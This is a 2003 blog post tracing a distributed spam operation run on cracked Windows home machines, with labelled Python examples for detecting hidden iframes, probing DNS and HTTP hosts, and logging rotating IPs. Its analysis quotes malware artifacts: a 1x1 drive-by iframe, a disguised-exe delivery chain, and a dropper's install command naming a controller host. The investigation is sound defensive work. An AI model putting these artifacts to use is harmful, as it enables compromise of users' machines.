Tracing distributed spam attacks
The story continues
October 15, 2003
A couple of weeks ago, we started to receive a steady stream of bounced spam. Someone was sending large amounts of spam, using forged random mail addresses from our domain as the sender address. Of course, many of the bounces ended up at our mail server.
The stream of bounces, about one every 10 seconds, wasn't large enough to pose any real problems, but it was still mildly irritating. I decided to take a stab at tracing the spammers. I took a sample of the bounces and found that the spam advertised the shady pharmacy site drugstorepharmacy.biz and originated from machines all around the world, from Venezuela to China, typically connected via ADSL. Some of them were still reachable, and nmap detected all of them as "Windows Millennium Edition (Me), Win 2000, or WinXP". Typical broadband connected home or SOHO boxen in other words, obviously cracked. This was getting interesting.
I have by now observed cracked machines in large parts of the world, including Sweden and other Nordic countries.
Now, if you check the A records for drugstorepharmacy.biz, you find that the site is served by the same kind of compromised windows machines. Not only is the spam sent from obscure home machines, for which you have little or no chance of reaching the owner, but the actual spamvertised websites are served by the same machines. This is bad news for a spam fighter.
But it gets even better...
Check the name server records for drugstorepharmacy.biz. The name services are provided by ns[1-5].bubra.biz, which point to - yes, you guessed it - the same kind of cracked windows machines. The compromised machines also get turned into name servers.
The IP addresses for the bubra.biz name servers are constantly changing. Presumably the machines used as name servers are discovered and disinfected from time to time, and so the name server information is updated from a pool of available cracked machines.
I started out on an everyday spam hunt, but ended up discovering a distributed network of cracked windows boxen, providing a complete spamming platform. The whole suite of necessary services is run from the machines of unsuspecting home users, and as soon as you pull the plug on one, the spammers can probably bring five more on-line.
So, are these guys untouchable? Not quite, as it turns out.
All these cracked windows machines seemed to run a web server on port 80, claiming to be an Apache, and serving a nondescript porn page as the default page. Checking back a few days later, the page was gone. Possibly the network had gone into a nonspreading mode.
Anyway, I checked the page source for clues, and found a suspicious looking line:
<iframe src=/cgi-bin/sc5.pl width="1" height="1">
It turned out this CGI script performed a 302-type redirect to http://vhost01.768men.info:nnnnn, with nnnnn being a varying high port number, like 11076.
At that time, vhost01.768men.info resolved to 220.127.116.11, which seems to be a Linux machine at hosthype.com, seemingly a respectable hosting company, at least at a cursory glance.
The high port number seemed to vary in a time dependent manner, but if I connected to it quickly enough, I found what claimed to be an Apache web server, serving an exe-file (link is obfuscated) MIME declared as text/css. Now, this is an obvious attack, targeting the Internet Explorer vulnerabilities addressed in Microsoft bulletins MS01-058 and MS02-023. Anyone accessing one of the cracked machines with a vulnerable version of Internet Explorer would automatically download and execute the exe-file. Ouch.
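The two indicators described above, a 1x1 iframe pointing at a CGI script and a response whose declared MIME type (text/css) does not match the executable it actually carries, are both cheap to check for mechanically. The following is an added example, not the author's code: it parses fetched HTML for tiny iframes and compares a declared Content-Type against the body's magic bytes. The sample page and body are constructed for the example; the only real-looking value is the /cgi-bin/sc5.pl path quoted above.

```python
# Added example (not from the original post): defender-side checks for the
# drive-by indicators described in the text: a 1x1 iframe, and a body whose
# bytes say "PE executable" while the Content-Type header says text/css.
from html.parser import HTMLParser


class TinyIframeFinder(HTMLParser):
    """Collect the src of every iframe whose width and height are both <= 2px."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        try:
            # Missing dimensions default to something large, i.e. "not hidden".
            w = int(a.get("width", "100"))
            h = int(a.get("height", "100"))
        except ValueError:
            return
        if w <= 2 and h <= 2:
            self.hits.append(a.get("src", ""))


def find_tiny_iframes(html):
    """Return the src attributes of all near-invisible iframes in `html`."""
    parser = TinyIframeFinder()
    parser.feed(html)
    return parser.hits


# Magic bytes of file types a browser should never be handed as "text/css".
MAGIC = {
    b"MZ": "application/x-dosexec",  # DOS/PE executable header
}


def mime_mismatch(declared_type, body):
    """Return the sniffed type if `body` is an executable but `declared_type`
    claims otherwise; return None when the declaration is honest."""
    for magic, real in MAGIC.items():
        if body.startswith(magic) and not declared_type.lower().startswith(real):
            return real
    return None


# Constructed samples for the example (not captured from any real machine).
SAMPLE_PAGE = (
    '<html><body><img src="x.jpg">'
    '<iframe src=/cgi-bin/sc5.pl width="1" height="1"></iframe>'
    "</body></html>"
)
SAMPLE_BODY = b"MZ\x90\x00" + b"\x00" * 60  # first bytes of a PE file, padded

if __name__ == "__main__":
    print("hidden iframes:", find_tiny_iframes(SAMPLE_PAGE))
    print("mismatch:", mime_mismatch("text/css", SAMPLE_BODY))
```

Both checks are deliberately dumb: a hidden iframe is not proof of anything by itself, and only the MZ signature is listed here, but a page that trips both is exactly the pattern the post describes and is worth a closer look before anyone opens it in a browser.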
I got help from more Windows-savvy people to analyse the 4095 byte exe-file. It contained interesting references to the IP address 18.104.22.168. This address has broken reverse DNS; its PTR record points to ".", but it belongs to fdcservers.net, which also looks like a respectable hosting company, based in Chicago.
Looking that machine over, I found that if I made a TCP connection to port 5555, I got a 99 kB exe-file thrown at me.
This new exe-file turned out to be a UPX-compressed RAR archive, containing the three files Msm.exe, regsocks5.exe and ssocks5.dll, plus a trigger to run the installation command "regsocks5.exe 1025-65535 120 120 55124 sock2.ucp6.biz".
These files seem to install and configure MS Proxy Server, which, of course, can be used to send spam.
So, summing all this up, it would seem that if you visit that porn page on one of the cracked windows boxes, using a vulnerable version of Internet Explorer, your machine will be turned into a spam spreading proxy server, just like the machine you visited. You have been assimilated.
That hostname that turns up in the installation command, sock2.ucp6.biz, is another machine at fdcservers.net, with the same broken reverse DNS. And whaddayaknow, if you connect to port 80 on sock2.ucp6.biz and speak a bit of HTTP to it:
GET / HTTP/1.1
Host: drugstorepharmacy.biz
you get the home page for drugstorepharmacy.biz, the site that was spamvertised in the first place. A-ha! It seems we really were on the right track.
So, presumably the cracked machines weren't actually serving the website, they were only proxying incoming connections to sock2.ucp6.biz.
Incidentally, if you send a DNS query for drugstorepharmacy.biz to sock2.ucp6.biz, it admits to having authoritative information for that domain (the aa flag is set in the reply), so it seems likely that DNS queries sent to a cracked machine are forwarded to sock2.ucp6.biz.
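The two probes used above (an HTTP/1.1 request with a chosen Host header, and a DNS query whose reply is checked for the aa flag) are simple enough to spell out in code. What follows is an added example, not the author's script: it builds the request bytes, builds a minimal DNS query, and decodes the 12-byte DNS header so the aa bit can be tested. The `query_server` helper is the only part that talks to the network and is left for the reader to call; everything else runs offline against a constructed reply.

```python
# Added example (not from the original post): the virtual-host probe and the
# DNS aa-flag check described in the text, with the wire-format details spelled out.
import socket
import struct


def build_host_probe(vhost, path="/"):
    """HTTP/1.1 request asking a server for a specific virtual host."""
    return (
        f"GET {path} HTTP/1.1\r\nHost: {vhost}\r\nConnection: close\r\n\r\n"
    ).encode("ascii")


def build_dns_query(name, qid=0x1234, qtype=1):
    """Minimal DNS query: one question, RD set, qtype 1 = A record."""
    labels = b"".join(
        struct.pack("B", len(p)) + p.encode("ascii")
        for p in name.rstrip(".").split(".")
    )
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)  # RD=1
    return header + labels + b"\x00" + struct.pack(">HH", qtype, 1)  # class IN


def parse_dns_header(resp):
    """Decode the 12-byte DNS header. AA is bit 10 of the flags word."""
    if len(resp) < 12:
        raise ValueError("short DNS response")
    qid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", resp[:12])
    return {
        "id": qid,
        "is_response": bool(flags & 0x8000),  # QR
        "aa": bool(flags & 0x0400),           # authoritative answer
        "rcode": flags & 0x000F,
        "qdcount": qd,
        "ancount": an,
    }


def constructed_response(query, aa, ancount=1):
    """Fabricate a reply to `query` for offline testing (constructed, not captured).
    The question section is copied back; no answer RRs are encoded."""
    qid = struct.unpack(">H", query[:2])[0]
    flags = 0x8180 | (0x0400 if aa else 0)  # QR, RD, RA (+ AA)
    return struct.pack(">HHHHHH", qid, flags, 1, ancount, 0, 0) + query[12:]


def query_server(server, name, timeout=5.0):
    """Send one UDP query for `name` straight to `server` (the dig-style
    'dig @server name' check) and return the parsed header."""
    q = build_dns_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(q, (server, 53))
        data, _ = s.recvfrom(4096)
    hdr = parse_dns_header(data)
    if hdr["id"] != struct.unpack(">H", q[:2])[0]:
        raise ValueError("reply id does not match query")
    return hdr


if __name__ == "__main__":
    print(build_host_probe("drugstorepharmacy.biz").decode())
    demo = constructed_response(build_dns_query("drugstorepharmacy.biz"), aa=True)
    print(parse_dns_header(demo))
```

A host that returns the spamvertised site for that Host header, and sets aa for the domain without appearing anywhere in the domain's delegation, is behaving as the backend the cracked machines forward to, which is the conclusion the post draws.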
This is as far as I can go; I would need customer records from fdcservers.net and hosthype.com to trace the spammers any further. This is where the appropriate law enforcement agencies should take over.
By now, I have e-mailed CERT, and only got an autoreply back. I have tried to get the attention of FBI via their tip page. I have called the Swedish national IT crime squad. They didn't call back.
Meanwhile, the spamming continues.
October 27, 2003
I got published on Slashdot. Suddenly it took quite a while longer to open my mailbox than it usually does...
Thanks, all; I've got a number of interesting contacts now. And today I even got a reply from FBI, your basic boilerplate saying approximately "We're aware of the issue, thankyouverymuch, donotreplytothisaddress." Whee.
A couple of days after my initial investigations, the bubra.biz network seemed to go into a non-contagious mode. The IE-targeting porn page was no longer served from the infected windows machines. Then the machines at hosthype and fdcservers went away.
As I'm writing this, the bubra.biz network seems to have been largely abandoned. The nameserver records are still being updated, but fewer and fewer of the hosts being pointed to seem to be working.
Instead, the operations seem to have moved to grass-smokers.biz, which is an identical network of cracked windows machines, except that they are obviously proxying connections somewhere else (since the original server at fdcservers is down).
I'm now keeping an automated log of the machines that are or have been a part of the bubra/grass-smokers networks.
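The constantly rotating name-server addresses described earlier (ns[1-5].bubra.biz pointing at an ever-changing pool of cracked machines) and the automated log mentioned here both come down to the same bookkeeping: take a resolution snapshot, merge it into a first-seen/last-seen table, and note what appeared and what dropped out. The block below is an added example of that bookkeeping, not the author's actual logging script. It parses `dig +short` output, keeps the table in memory, and the `snapshot_via_dig` helper (the only part that touches the network, and which needs dig installed) is left for the reader to call; the snapshots in the test use RFC 5737 documentation addresses, not the real pool.

```python
# Added example (not from the original post): append-only tracking of the
# IP addresses a hostname has resolved to over time, so that churn in a
# pool of compromised machines can be observed and the full set retained.
import ipaddress
import subprocess


def parse_dig_short(text):
    """Return only the IPv4 addresses from `dig +short` output.
    (An NS lookup prints hostnames, an A lookup prints addresses; we keep
    just the addresses so either can be piped in.)"""
    addrs = []
    for line in text.splitlines():
        line = line.strip()
        try:
            ipaddress.IPv4Address(line)
        except ValueError:
            continue
        addrs.append(line)
    return addrs


def snapshot_via_dig(hostname):
    """Resolve `hostname` with the dig CLI (requires dig on PATH)."""
    out = subprocess.run(
        ["dig", "+short", hostname], capture_output=True, text=True, check=True
    ).stdout
    return parse_dig_short(out)


def record_snapshot(log, hostname, addrs, seen_at):
    """Merge one snapshot into `log` (dict keyed by IP). Entries are never
    deleted; a machine that stops resolving keeps its old last_seen.
    Returns the addresses that were not in the log before."""
    new = []
    for ip in addrs:
        entry = log.get(ip)
        if entry is None:
            log[ip] = {"first_seen": seen_at, "last_seen": seen_at, "names": {hostname}}
            new.append(ip)
        else:
            entry["last_seen"] = seen_at
            entry["names"].add(hostname)
    return new


def dropped_out(log, current_addrs):
    """Addresses seen earlier that are absent from the current snapshot:
    candidates for 'disinfected or pulled from the pool'."""
    current = set(current_addrs)
    return sorted(ip for ip in log if ip not in current)


if __name__ == "__main__":
    # Constructed walk-through with documentation addresses.
    log = {}
    first = parse_dig_short("192.0.2.10\n192.0.2.11\n")
    print("new on day 1:", record_snapshot(log, "ns1.example", first, "day1"))
    second = ["192.0.2.11", "198.51.100.7"]
    print("new on day 2:", record_snapshot(log, "ns1.example", second, "day2"))
    print("gone on day 2:", dropped_out(log, second))
```

Running the snapshot on a timer against each ns[1-5] name and feeding the results into `record_snapshot` gives exactly the "machines that are or have been part of the network" list: the table only grows, and `dropped_out` shows the churn between runs.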